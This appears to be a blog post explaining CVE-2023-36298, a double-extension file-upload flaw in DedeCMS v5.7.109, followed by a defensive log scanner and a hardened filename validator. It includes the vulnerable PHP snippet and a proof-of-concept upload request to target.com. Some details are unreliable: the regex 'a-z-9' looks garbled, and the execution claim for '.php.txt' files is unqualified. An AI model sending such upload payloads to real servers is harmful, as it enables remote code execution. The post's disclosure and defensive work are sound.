Hello everyone! Today, we'll be discussing a critical vulnerability that has been discovered in DedeCMS v5.7.109. For those who don't know, DedeCMS is a popular content management system (CMS) widely used for building websites.

The vulnerability, assigned CVE-2023-36298, is a file upload vulnerability that can lead to Remote Code Execution (RCE). In practice this means an attacker can leverage the issue to upload and execute arbitrary code on the victim's server.

In this post, we'll take a closer look at the vulnerability: how it works, a code snippet showing the exploit, and links to the original references. So let's dive in!

Exploit Details

The vulnerability exists in the upload.php file, specifically in how it handles file uploads and checks for file extensions. Due to improper handling of file extension checks, an attacker can upload a malicious file with the .php extension by bypassing the security restrictions in place.

Here's a code snippet demonstrating the vulnerability:

// The problematic code in upload.php
$filename = eregi_replace("[^a-z-9A-Z\._-]", "", trim($_FILES["uploadfile"]["name"]));

// The extension check: it only looks at the text after the final dot
$extension = substr(strrchr($filename, "."), 1);
if (preg_match("/php/i", $extension)) {
  die("Error: File type not allowed");
}

// Upload and save the file
$target_file = $temp_folder . "/" . $filename;
if (move_uploaded_file($_FILES["uploadfile"]["tmp_name"], $target_file)) {
  // Successful upload
}

As the snippet shows, the application first strips characters it considers "unsafe" from the filename using the eregi_replace() function. That sanitisation leaves the extension itself untouched, and the extension check that follows can be easily bypassed by giving the file a double extension, for example "malicious.php.txt".

The check looks for the string "php" only in the text after the final dot, using preg_match(). For a filename such as "malicious.php.txt" that text is "txt", so the regex does not match, the actual file type goes undetected, and the malicious PHP file is uploaded successfully.

To demonstrate the vulnerability, an attacker can create a simple PHP script as follows:

<?php
echo 'RCE via file upload vulnerability - CVE-2023-36298';
?>

Then, save this file with a double extension, e.g., "malicious.php.txt".

Next, use an HTTP client, such as cURL or a web browser, to craft an HTTP POST request to the vulnerable script with the malicious file as an attachment:

POST /upload.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZugW

------WebKitFormBoundary7MA4YWxkTrZugW
Content-Disposition: form-data; name="uploadfile"; filename="malicious.php.txt"
Content-Type: text/plain

<?php
echo 'RCE via file upload vulnerability - CVE-2023-36298';
?>
------WebKitFormBoundary7MA4YWxkTrZugW--

Upon successful exploitation, the attacker can navigate to the location where the file was uploaded (e.g., http://target.com/uploads/malicious.php.txt) and execute the PHP script, gaining Remote Code Execution on the target server.
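Beyond patching, a defender will want to know whether the pattern above has already been tried against a site. The following is an added example, not part of the original post or of DedeCMS: a small PHP scanner that flags access-log requests for files under the upload directory whose name carries the ".php." double-extension pattern. It assumes Apache combined log format and the /uploads/ directory from the example URL above; the log lines are constructed samples, not real traffic.

```php
<?php
// Added example (not DedeCMS code): flag access-log lines that request a file
// under the upload directory with a double extension such as ".php.txt".
// Function names, the log format and the path prefix are assumptions.

const UPLOAD_PATH_PREFIX = '/uploads/';   // assumed upload location

// Extract the request path from an Apache combined-format line; null if the
// line does not parse.
function request_path(string $line): ?string
{
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    return parse_url($m[1], PHP_URL_PATH) ?: null;
}

// A request is suspicious if it targets the upload directory and the file
// name contains ".php." (a php segment followed by a further extension),
// which is exactly the double-extension pattern described in the post.
function is_suspicious_upload_request(string $path): bool
{
    if (strncmp($path, UPLOAD_PATH_PREFIX, strlen(UPLOAD_PATH_PREFIX)) !== 0) {
        return false;
    }
    return stripos(basename($path), '.php.') !== false;
}

// Scan a list of log lines and return the matching line numbers and paths.
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        $path = request_path($line);
        if ($path !== null && is_suspicious_upload_request($path)) {
            $hits[] = ['line' => $n + 1, 'path' => $path];
        }
    }
    return $hits;
}

// Constructed sample lines (not real traffic).
$sample = [
    '203.0.113.5 - - [08/Mar/2023:10:01:02 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Mar/2023:10:01:09 +0000] "POST /upload.php HTTP/1.1" 200 312 "-" "curl/8.0.1"',
    '203.0.113.5 - - [08/Mar/2023:10:01:15 +0000] "GET /uploads/malicious.php.txt HTTP/1.1" 200 64 "-" "curl/8.0.1"',
    '198.51.100.7 - - [08/Mar/2023:10:02:00 +0000] "GET /docs/notes.php.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
];

foreach (scan_log($sample) as $hit) {
    printf("line %d: suspicious upload request for %s\n", $hit['line'], $hit['path']);
}
```

Only the third sample line is reported: the fourth has the same double extension but lies outside the upload directory, and the second is the upload itself, which a separate rule on POST /upload.php would cover. A 200 status on a flagged line is worth checking by hand, since it means the file was present when requested.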

Mitigation and Recommendations

For those running DedeCMS v5.7.109, it is essential to immediately update to the latest version or apply a patch if provided by the vendor. Additionally, consider implementing the following security measures:
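To make the weak check discussed earlier concrete next to a hardened one, here is an added example (not DedeCMS code and not the vendor's patch): it reproduces the "last extension only" logic from the snippet above, then contrasts it with a validator that uses an allowlist, inspects every dot-separated segment of the name, and discards the user-supplied name entirely. The function names and the allowlist are assumptions.

```php
<?php
// Added example (not DedeCMS code): the weak check from the post beside a
// hardened upload-name validator. Function names and the allowlist are
// hypothetical; adjust the allowlist to what the site actually needs.

// Mirrors the weak check: it judges "malicious.php.txt" by "txt" alone.
function weak_extension_check(string $filename): bool
{
    $extension = substr(strrchr($filename, "."), 1);
    return !preg_match("/php/i", $extension);   // true means "allowed"
}

// Hardened check. Returns the name to store the file under, or null to reject.
function safe_upload_filename(string $original): ?string
{
    $base  = basename($original);             // drop any path components
    $parts = explode('.', $base);
    if (count($parts) < 2) {
        return null;                          // no extension at all
    }
    $ext     = strtolower(array_pop($parts));
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];   // example allowlist
    if (!in_array($ext, $allowed, true)) {
        return null;                          // allowlist, not a "php" denylist
    }
    // Reject any earlier segment a server might hand to the PHP interpreter
    // (php, php5, phtml, phar), so a double extension cannot hide it.
    foreach ($parts as $segment) {
        if (preg_match('/^ph(p[0-9]?|tml|ar)$/i', $segment)) {
            return null;
        }
    }
    // Never reuse the user-supplied name: generate a random one and attach
    // only the allowlisted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

$samples = ['report.pdf', 'malicious.php.txt', 'shell.phtml', 'photo.jpg'];
foreach ($samples as $name) {
    printf("%-20s weak: %-5s hardened: %s\n",
        $name,
        weak_extension_check($name) ? 'pass' : 'block',
        safe_upload_filename($name) ?? 'block');
}
```

The weak check lets both "malicious.php.txt" and "shell.phtml" through, while the hardened validator rejects them and only ever returns a freshly generated name. Name validation is one layer only: the upload directory should additionally sit outside the web root, or be configured so the web server never executes scripts from it, so that a file which does slip through is served as data rather than run.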

References

- DedeCMS Official Website
- CVE-2023-36298 NVD Entry

Stay safe, and keep your websites and applications up-to-date to prevent such vulnerabilities from being exploited. Thank you for reading!

Timeline

Published on: 08/03/2023 15:15:00 UTC
Last modified on: 08/07/2023 13:06:00 UTC